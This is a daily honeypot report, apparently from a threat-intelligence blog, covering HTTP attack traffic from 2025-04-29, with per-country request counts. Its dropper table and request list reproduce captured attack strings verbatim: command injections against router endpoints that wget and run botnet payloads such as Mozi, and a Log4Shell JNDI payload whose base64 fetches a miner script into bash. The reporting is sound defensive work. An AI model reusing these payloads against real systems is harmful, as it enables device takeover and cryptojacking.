Skip to main content
  1. Daily-Posts/

Report: 2025-04-29

·472 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-29
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 37 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2039 requests were recorded during the day, originating from 3 different countries, with a peak of 422 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
DESingapore
USDubai
FRGeorgia
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
8.152.208.190GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5 HTTP/1.1
122.5.101.10GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://122.5.101.10:43721/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
176.65.148.10GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://94.26.90.205/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/&currentsetting.htm=1; HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1214POST /login HTTP/1.1
1763GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//109.236.80.84:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDUuMTU2LjIzLjEwNy9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly80NS4xNTYuMjMuMTA3L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z%7D%27%29 HTTP/1.1
2512GET /php_version.php HTTP/1.1
2561GET /socket.io/1/?t=1745903763331 HTTP/1.1
2571GET /socket.io/1/?t=1745903786082 HTTP/1.1
2591GET /config/index?time=1745931287017251127 HTTP/1.1
2601GET /api/bin/440393?time=1745931421787264049 HTTP/1.1
2641GET /api/bin/440393?time=1745946950703298303 HTTP/1.1
2651POST /api/user/binLookup?time=1745946951188903828 HTTP/1.1
2661GET /api/bin/440393?time=1745946963238662086 HTTP/1.1
2671POST /api/user/binLookup?time=1745946963781257909 HTTP/1.1
2791\x00\x0E8\x09!'
2811POST /wordpress/wp-login.php HTTP/1.1
3031\x04\x01\x01\xBB@\xE9\xA3c\x00
3071\x00\x0E8\xB1\xD3\xE6\x8E\xBB\x9CP\x98\x00\x00\x00\x00\x00
3271GET /spD5 HTTP/1.1
3281GET /FaeQ HTTP/1.1
3341GET /api/bin/440393?time=1745936899442181549 HTTP/1.1
3351POST /api/user/binLookup?time=1745936899985655652 HTTP/1.1
3371\x00\x0E82\xEB^x\x8A7\xD7A\x00\x00\x00\x00\x00
3381GET /api/bin/440393?time=1745947873870694936 HTTP/1.1
3391POST /api/user/binLookup?time=1745947874658826181 HTTP/1.1
3401GET /api/bin/440393?time=1745947923286268476 HTTP/1.1
3411POST /api/user/binLookup?time=1745947924461940368 HTTP/1.1
3551GET /config/index?time=1745931483014616739 HTTP/1.1
3561GET /api/bin/440393?time=1745931757882064655 HTTP/1.1
3571POST /api/user/binLookup?time=1745931758260028815 HTTP/1.1
3601\x00\x0E8%\x1C\xDD\xF4iA\x1D`\x00\x00\x00\x00\x00
3611GET /api/bin/440393?time=1745947012862189074 HTTP/1.1
3621POST /api/user/binLookup?time=1745947013526381854 HTTP/1.1
3631GET /api/bin/440393?time=1745947022185089449 HTTP/1.1
3641POST /api/user/binLookup?time=1745947022571583934 HTTP/1.1
3691GET /odinhttpcall1745903555 HTTP/1.1
3711GET /OdinHttpCall1745903555 HTTP/1.1
3841\x00\x0E8w\xAF>\x96\xD8K\xFC\x9F\x00\x00\x00\x00\x00
3851GET /Odin/http/call1745903555 HTTP/1.1
4151GET /socket.io/1/?t=1745903748980 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0422NL
1421US
2234GB
3176SC
497FR
583RU
681DE
768PL
866HK
962CH
1051BE
1136VN
1235CN
1332JP
1423AU
1521CA
1617SG
1715TR
1810AO
1910UA
209PT
217KR
227BG
237ZA
246GH
256VE
266GE
274IL
284IN
293ID
303BR
313MU
322RO
332ES
342MC
352LA
361PA
371PE
381RS
391AF
401HN
411AE

Related

Report: 2025-04-28
·428 words
Repport Daily
Report: 2025-04-27
·571 words
Repport Daily
Report: 2025-04-26
·589 words
Repport Daily